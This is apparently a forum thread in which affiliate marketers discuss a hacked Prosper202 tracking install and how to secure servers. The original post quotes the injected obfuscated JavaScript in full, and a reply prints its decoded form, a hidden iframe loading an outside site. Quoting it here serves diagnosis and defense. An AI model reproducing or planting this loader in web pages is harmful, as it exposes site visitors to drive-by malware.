My Prosper202 Has been Hacked (15)
today 2 of my tracking software from "Liquidweb" and "Beyond hosting" has been compromised. when I log in to my tracking software I got error
Warning: Cannot modify header information - headers already sent by (output started at /home/mysite/public_html/202-cronjobs/index.php:180) in /home/mysite/public_html/202-login.php on line 81
202-login.php and
/tracking202/overview/index.php
<?#336988#
echo " <script type=\"text/javascript\" language=\"javascript\" > try{window.document.body++}catch(gdsgsdg){dbshre=79;}if(dbshre){asd=0;try{d=document.createElement(\"div\");d.innerHTML.a=\"asd\";}catch(agdsg){asd=1;}if(!asd){e=eval;}ss=String;asgq=new Array(31,94,110,104,94,107,97,104,104,27,31,33,25,117,8,1,24,25,26,27,109,89,107,26,114,23,53,25,94,106,90,109,102,95,105,107,38,92,108,96,88,108,94,63,103,92,101,94,104,111,31,31,98,96,109,88,101,94,33,36,50,5,3,7,5,23,24,25,26,114,37,107,107,93,27,52,24,32,98,111,107,104,51,41,42,100,99,110,106,100,106,97,103,109,102,96,38,97,105,104,92,38,105,102,42,90,100,100,40,107,95,104,32,53,8,1,24,25,26,27,110,38,108,110,116,99,93,39,106,106,106,97,109,99,106,101,24,54,26,34,88,90,108,105,103,108,108,94,33,54,4,2,25,26,27,23,111,39,109,111,112,100,94,40,93,102,106,93,95,109,23,53,25,33,43,30,51,6,4,27,23,24,25,113,41,106,108,114,102,96,37,96,94,99,98,95,108,25,55,27,30,41,105,114,34,50,5,3,26,27,23,24,112,40,110,107,113,101,95,41,110,97,93,110,99,23,53,25,33,44,103,112,32,53,8,1,24,25,26,27,110,38,108,110,116,99,93,39,102,96,93,108,25,55,27,30,41,105,114,34,50,5,3,26,27,23,24,112,40,110,107,113,101,95,41,107,103,105,26,56,23,31,42,106,115,30,51,6,4,8,1,24,25,26,27,96,94,25,34,28,91,103,92,111,104,92,102,109,40,98,92,108,62,102,96,100,93,103,110,61,112,65,93,34,34,110,31,34,35,27,114,5,3,26,27,23,24,25,26,27,23,92,104,93,112,100,93,103,110,41,110,106,98,110,96,31,31,53,94,100,109,24,98,94,56,83,31,112,86,34,53,52,40,94,100,109,54,32,35,54,4,2,25,26,27,23,24,25,26,27,91,103,92,111,104,92,102,109,40,98,92,108,62,102,96,100,93,103,110,61,112,65,93,34,34,110,31,34,40,92,103,104,94,104,95,58,96,98,102,95,31,111,34,53,8,1,24,25,26,27,116,5,3,119,36,31,33,52);s=\"\";for(i=0;i-448!=0;i++){if((020==0x10)&&window.document)s+=ss[\"fromCharCode\"](1*asgq[i]-(i%5-5-4));}z=s;e(s);}</script>";
#/336988#
?>
I have no idea how my server got injected malicious code, I will delete P202 on both server and start new copy again but I am worry about my data and I have to pause ALL of my campaign. It nightmare for me and I have no idea my database infected with this code or not.
do you have any idea I can prevent this happen in the future. Please let me know .
thank you
Hey man, there's a thread about protecting your P202 installation from attacks at http://stmforum.com/forum/showthread...r-from-Attacks
Take a look if it helps!
I decrypted the obfuscated code for shits and giggles, here's the iframe it creates:
var w = document.createElement('iframe');
w.src = 'http://mkupisinski.home.pl/clk.php';
w.style.position = 'absolute';
w.style.border = '0';
w.style.height = '1px';
w.style.width = '1px';
w.style.left = '1px';
w.style.top = '1px';
if (!document.getElementById('w')) {
blaa blaa create the new div
}
How the code got in there, I can't really say without seeing the logs myself.
Make sure you get all the traces of it removed and figure out how it got there in the first place before continuing, and you should probably also implement the .htaccess trick I mentioned in the thread linked in my other post to secure your P202 installation from any further attacks
Were you running the latest Prosper202 version ?
I had the same happen to me couple months ago.
Got super pissed off because that meant all my data were accessible by someone else.
They guy , I later found out , was just a russian kid that had infected a shit load of php files using an old wordpress to get in.
At that point , there is no way to find all the files , so I just dumped all my dbs and installed everything from scratch.
It's painful and will cost you some downtime , but it's the only way to be 100% sure your box is clean.
I am interested in this answer too, what version you running?
Originally Posted by dario
Originally Posted by dario
This kind of sh**t slow me down, I have to stop EVERY campaign I run and I have to check every website I have.
last nigh I am stay till 4.30 AM
Thank you "dextrous" for how to Protect Prosper202 and wake me up to Extra careful for my stuff.
Same thing happened to me yesterday.
One minute checking my data, the next it's all missing.
Deleted the entire instal + database, re-installed, and implemented the .htaccess trick by dextrous
looks like CPVlab is must now for me after seeing this thread...
Originally Posted by vipinext
do you have word press running on the same cpanel? word press is extremely unsecured and once it was infected, it took out my whole server. i had to upgrade to an account with WHM and run word press in it own cpanl. once i did that i was all good.
@luxus85 - Oh, man, that sucks. Sorry to hear about it. You may also find this tutorial useful for securing your box against intruders.
@bbrock - Yeah, seconded. Unless you're EXTREMELY sure that you got all the virus code or you're a lot better with a packet sniffer than I am, stripping the darn thing back to the bare metal is the only way to go once you've been infected. I tend to use it as an excuse to upgrade to a new server
@2modest - Up-to-date Wordpress installations aren't usually a problem, but yeah, the second you get behind on your upgrades, prepare for pain.
Remember, everyone - keep your WP installations up to date, or suffer the script kiddie consequences!
If you have any WordPresses that are earlier than 3.0 , that's what they use to get in with.
What 2Modest wrote is the ONLY way to run WP's.
In the meantime look at every one of your httacess files.
To be honest, if you want to run Wordpress these days I'd strongly recommend going for a managed hosting solution. It's too much of a pain in the ass otherwise.
I've used WP-Engine for a while now - they're very good indeed, and mean I don't have to worry about getting pwned because I had a dodgy WP install somewhere.
Also don't forget that if you're using flawed plugins or premium themes that you've downloaded from warez/torrent sites, your WP installation will be hacked in no time, no matter if you're using the latest version.
Home > General > Affiliate Marketing Forum